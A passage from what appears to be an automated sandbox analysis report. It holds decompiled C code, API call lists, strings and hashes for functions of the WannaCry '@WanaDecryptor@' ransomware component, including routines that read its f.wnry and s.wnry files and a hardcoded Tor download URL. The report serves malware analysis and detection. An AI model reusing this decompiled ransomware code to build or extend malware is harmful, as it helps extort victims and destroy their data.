					goto L5;
				}
				return _t17;
			}











                                                      0x00406ef0
                                                      0x00406f01
                                                      0x00406f6a
                                                      0x00406f6e
                                                      0x00000000
                                                      0x00406f6e
                                                      0x00406f03
                                                      0x00406f06
                                                      0x00406f09
                                                      0x00406f0f
                                                      0x00406f10
                                                      0x00406f14
                                                      0x00406f15
                                                      0x00406f1d
                                                      0x00406f23
                                                      0x00406f25
                                                      0x00406f2d
                                                      0x00406f2f
                                                      0x00406f2f
                                                      0x00406f3f
                                                      0x00406f57
                                                      0x00406f5d
                                                      0x00406f61
                                                      0x00406f62
                                                      0x00000000
                                                      0x00406f67
                                                      0x00406f78

                                                      APIs
                                                      • #823.MFC42(?), ref: 00406F15
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                                      • #825.MFC42(?), ref: 00406F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825ExecuteMessageSendShell
                                                      • String ID: open
                                                      • API String ID: 1093558810-2758837156
                                                      • Opcode ID: fd047fd9ae49066b11ca0bfdd1a15bae3696c59196635434c28e1a6aef66c3a1
                                                      • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                                      • Opcode Fuzzy Hash: fd047fd9ae49066b11ca0bfdd1a15bae3696c59196635434c28e1a6aef66c3a1
                                                      • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004030E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135B3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_push(__ecx);
				_push(_a4);
				_push(0x8a);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
				 *((intOrPtr*)(__ecx)) = 0x415958;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *[fs:0x0] = _v20;
				return __ecx;
			}







                                                      0x004030e0
                                                      0x004030e2
                                                      0x004030ed
                                                      0x004030ee
                                                      0x004030f5
                                                      0x004030ff
                                                      0x00403100
                                                      0x00403105
                                                      0x00403109
                                                      0x00403115
                                                      0x00403119
                                                      0x0040311e
                                                      0x0040312a
                                                      0x00403131
                                                      0x0040313a
                                                      0x00403140
                                                      0x00403146
                                                      0x00403150
                                                      0x00403156
                                                      0x00403160
                                                      0x00403166
                                                      0x00403171
                                                      0x0040317b

                                                      APIs
                                                      • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #567$#324
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 784016053-3838179817
                                                      • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                                      • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(E00413809);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_push(_a4);
				_push(0x89);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
				_push(0x421798);
				_v12 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415ec8;
				L00412DA0();
				 *[fs:0x0] = _v24;
				return __ecx;
			}







                                                      0x00404c40
                                                      0x00404c42
                                                      0x00404c4d
                                                      0x00404c4e
                                                      0x00404c55
                                                      0x00404c5e
                                                      0x00404c5f
                                                      0x00404c64
                                                      0x00404c68
                                                      0x00404c70
                                                      0x00404c7a
                                                      0x00404c7f
                                                      0x00404c86
                                                      0x00404c8d
                                                      0x00404c94
                                                      0x00404c9b
                                                      0x00404ca2
                                                      0x00404ca7
                                                      0x00404cad
                                                      0x00404cba
                                                      0x00404cc4

                                                      APIs
                                                      • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                                      • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                                      • #860.MFC42(00421798), ref: 00404CAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #324#540#860
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 1048258301-3838179817
                                                      • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                                      • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408B40 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00408B40(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t23;
				int _t25;
				intOrPtr _t30;
				int _t38;
				int _t41;
				intOrPtr* _t43;
				int _t45;
				intOrPtr _t47;
				struct HDC__* _t50;
				intOrPtr _t52;

				_push(0xffffffff);
				_push(E0041407B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t47 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4166e0;
				_t23 =  *((intOrPtr*)(__ecx + 0x30));
				_t50 = 0;
				_v4 = 1;
				if(_t23 == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t41 =  *(__ecx + 0x24);
					_t45 =  *(__ecx + 0x20);
					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
					if(__ecx != 0) {
						_t50 =  *(__ecx + 4);
					}
					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
					_t23 =  *((intOrPtr*)(_t47 + 0x18));
					if(_t23 != 0) {
						_t23 =  *((intOrPtr*)(_t23 + 4));
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					} else {
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					}
				}
				_t43 = _t47 + 0x10;
				_v16 = _t43;
				 *_t43 = 0x415c00;
				_v4 = 2;
				L00412D52();
				 *_t43 = 0x415bec;
				_v4 = 0xffffffff;
				L00412E3C();
				 *[fs:0x0] = _v12;
				return _t23;
			}

















                                                      0x00408b40
                                                      0x00408b42
                                                      0x00408b4d
                                                      0x00408b4e
                                                      0x00408b5a
                                                      0x00408b5d
                                                      0x00408b61
                                                      0x00408b67
                                                      0x00408b6a
                                                      0x00408b6e
                                                      0x00408b76
                                                      0x00408bd0
                                                      0x00408bd3
                                                      0x00408b78
                                                      0x00408b78
                                                      0x00408b7e
                                                      0x00408b84
                                                      0x00408b8b
                                                      0x00408b8d
                                                      0x00408b92
                                                      0x00408b94
                                                      0x00408b94
                                                      0x00408ba7
                                                      0x00408bad
                                                      0x00408bb3
                                                      0x00408bc1
                                                      0x00408bc7
                                                      0x00408bc8
                                                      0x00408bc9
                                                      0x00408bb5
                                                      0x00408bb8
                                                      0x00408bb9
                                                      0x00408bba
                                                      0x00408bba
                                                      0x00408bb3
                                                      0x00408bd6
                                                      0x00408bd9
                                                      0x00408bdd
                                                      0x00408be5
                                                      0x00408bea
                                                      0x00408bf1
                                                      0x00408bf7
                                                      0x00408bff
                                                      0x00408c0b
                                                      0x00408c15

                                                      APIs
                                                      • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                                      • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785$#2414#640
                                                      • String ID:
                                                      • API String ID: 2719443296-0
                                                      • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                                      • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404530 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00404530(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				void* _v36;
				struct tagSIZE _v48;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _t21;
				void* _t22;
				intOrPtr _t41;

				_push(0xffffffff);
				_push(E004137C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
				if(_t21 == 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x58));
					if(_t21 != 0) {
						_push(__ecx);
						L00412DEE();
						_t22 = __ecx + 0x48;
						_push(_t22);
						_v8 = 0;
						L00412DCA();
						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
						_push(_t22);
						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
						L00412DCA();
						 *((char*)(__ecx + 0x5a)) = 1;
						_v32 = 0xffffffff;
						L00412DE8();
					}
				}
				 *[fs:0x0] = _v12;
				return _t21;
			}














                                                      0x00404536
                                                      0x00404538
                                                      0x0040453d
                                                      0x0040453e
                                                      0x0040454b
                                                      0x00404550
                                                      0x00404552
                                                      0x00404557
                                                      0x0040455a
                                                      0x0040455f
                                                      0x00404564
                                                      0x0040456b
                                                      0x0040456c
                                                      0x00404574
                                                      0x0040458d
                                                      0x0040459b
                                                      0x0040459e
                                                      0x004045a3
                                                      0x004045a6
                                                      0x004045af
                                                      0x004045b3
                                                      0x004045bb
                                                      0x004045c0
                                                      0x00404557
                                                      0x004045c6
                                                      0x004045d0

                                                      APIs
                                                      • #289.MFC42 ref: 0040455F
                                                      • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                      • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                      • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                      • #613.MFC42 ref: 004045BB
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#289#613ExtentPoint32Text
                                                      • String ID:
                                                      • API String ID: 888490064-0
                                                      • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                                      • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004031A0 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E004031A0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135FF);
				_t15 =  *[fs:0x0];
				_push(_t15);
				 *[fs:0x0] = _t30;
				_v20 = __ecx;
				_v4 = 0;
				_t24 = __ecx + 0xec;
				_v16 = _t24;
				 *_t24 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t24 = 0x415bec;
				_t25 = __ecx + 0xe0;
				_v16 = _t25;
				 *_t25 = 0x415c00;
				_v4 = 5;
				L00412D52();
				 *_t25 = 0x415bec;
				_v4 = 1;
				L00412D4C();
				_v4 = 0;
				L00412D3A();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t15;
			}











                                                      0x004031a0
                                                      0x004031a2
                                                      0x004031a7
                                                      0x004031ad
                                                      0x004031ae
                                                      0x004031bc
                                                      0x004031c0
                                                      0x004031c8
                                                      0x004031ce
                                                      0x004031d2
                                                      0x004031da
                                                      0x004031df
                                                      0x004031e4
                                                      0x004031ea
                                                      0x004031f0
                                                      0x004031f4
                                                      0x004031fc
                                                      0x00403201
                                                      0x0040320c
                                                      0x00403212
                                                      0x00403217
                                                      0x0040321f
                                                      0x00403224
                                                      0x0040322b
                                                      0x00403233
                                                      0x0040323e
                                                      0x00403248

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                                      • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                                      • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                                      • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#616#641#693
                                                      • String ID:
                                                      • API String ID: 1164084425-0
                                                      • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                                      • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BE90 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 18stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040BE90(char* _a4, char* _a8, char* _a12) {

				strncpy("s.wnry", _a4, 0x63);
				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
				strncpy(0x4221ac, _a12, 0x63);
				return 0;
			}



                                                      0x0040be9c
                                                      0x0040bead
                                                      0x0040bebe
                                                      0x0040bec8

                                                      APIs
                                                      Strings
                                                      • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
                                                      • s.wnry, xrefs: 0040BE97
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy
                                                      • String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
                                                      • API String ID: 3301158039-3000313716
                                                      • Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                                      • Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
                                                      • Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                                      • Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E00403AF0(void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v12;
				char _v1252;
				void _v2251;
				char _v2252;
				int _v2256;
				signed int _t43;
				signed char _t44;
				signed int _t52;
				signed int _t58;
				signed int _t75;
				signed int _t78;
				struct _IO_FILE* _t103;
				intOrPtr _t111;
				void* _t113;

				_push(0xffffffff);
				_push(E0041369B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				_t103 = fopen("f.wnry", "rt");
				_t113 = _t111 - 0x8c4 + 8;
				if(_t103 != 0) {
					E00401E90( &_v1252, __eflags);
					_v4 = 0;
					_t43 = E00402020( &_v1252, 0, E00403810, 0);
					__eflags = _t43;
					if(_t43 != 0) {
						_t44 =  *(_t103 + 0xc);
						_v2256 = 0;
						__eflags = _t44 & 0x00000010;
						if((_t44 & 0x00000010) == 0) {
							while(1) {
								_v2252 = 0;
								memset( &_v2251, 0, 0xf9 << 2);
								asm("stosw");
								asm("stosb");
								_t52 = fgets( &_v2252, 0x3e7, _t103);
								_t113 = _t113 + 0x18;
								__eflags = _t52;
								if(_t52 == 0) {
									break;
								}
								asm("repne scasb");
								_t75 = 0xbadbac;
								__eflags = 0xbadbac;
								if(0xbadbac != 0) {
									while(1) {
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										L9:
										asm("repne scasb");
										_t78 =  !(_t78 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
											goto L10;
										}
										asm("repne scasb");
										__eflags =  !(_t78 | 0xffffffff) != 1;
										if( !(_t78 | 0xffffffff) != 1) {
											_t58 = E00402650( &_v1252,  &_v2252);
											__eflags = _t58;
											if(_t58 != 0) {
												_t29 =  &_v2256;
												 *_t29 = _v2256 + 1;
												__eflags =  *_t29;
											}
										}
										goto L14;
										L10:
										asm("repne scasb");
										_t75 =  !(_t78 | 0xffffffff) - 1;
										 *((char*)(_t113 + _t75 + 0x13)) = 0;
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										goto L9;
									}
								}
								L14:
								__eflags =  *(_t103 + 0xc) & 0x00000010;
								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
									continue;
								}
								break;
							}
						}
						fclose(_t103);
						__eflags = _v2256;
						_t36 = _v2256 > 0;
						__eflags = _t36;
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						 *[fs:0x0] = _v12;
						return 0 | _t36;
					} else {
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}


















                                                      0x00403af6
                                                      0x00403af8
                                                      0x00403afd
                                                      0x00403afe
                                                      0x00403b1d
                                                      0x00403b21
                                                      0x00403b26
                                                      0x00403b48
                                                      0x00403b5b
                                                      0x00403b62
                                                      0x00403b67
                                                      0x00403b69
                                                      0x00403b9b
                                                      0x00403b9e
                                                      0x00403ba2
                                                      0x00403ba4
                                                      0x00403bb2
                                                      0x00403bbd
                                                      0x00403bc1
                                                      0x00403bc3
                                                      0x00403bc5
                                                      0x00403bd1
                                                      0x00403bd3
                                                      0x00403bd6
                                                      0x00403bd8
                                                      0x00000000
                                                      0x00000000
                                                      0x00403be7
                                                      0x00403beb
                                                      0x00403beb
                                                      0x00403bec
                                                      0x00403bee
                                                      0x00403bf7
                                                      0x00403bfb
                                                      0x00403bfc
                                                      0x00403c01
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c03
                                                      0x00403c0c
                                                      0x00403c10
                                                      0x00403c11
                                                      0x00403c16
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c35
                                                      0x00403c39
                                                      0x00403c3a
                                                      0x00403c48
                                                      0x00403c4d
                                                      0x00403c4f
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c4f
                                                      0x00000000
                                                      0x00403c18
                                                      0x00403c21
                                                      0x00403c25
                                                      0x00403c26
                                                      0x00403bf7
                                                      0x00403bfb
                                                      0x00403bfc
                                                      0x00403c01
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c01
                                                      0x00403bee
                                                      0x00403c55
                                                      0x00403c55
                                                      0x00403c59
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c59
                                                      0x00403c60
                                                      0x00403c62
                                                      0x00403c71
                                                      0x00403c73
                                                      0x00403c73
                                                      0x00403c7f
                                                      0x00403c8a
                                                      0x00403c9a
                                                      0x00403ca7
                                                      0x00403b6b
                                                      0x00403b72
                                                      0x00403b7d
                                                      0x00403b83
                                                      0x00403b8d
                                                      0x00403b9a
                                                      0x00403b9a
                                                      0x00403b28
                                                      0x00403b33
                                                      0x00403b40
                                                      0x00403b40

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
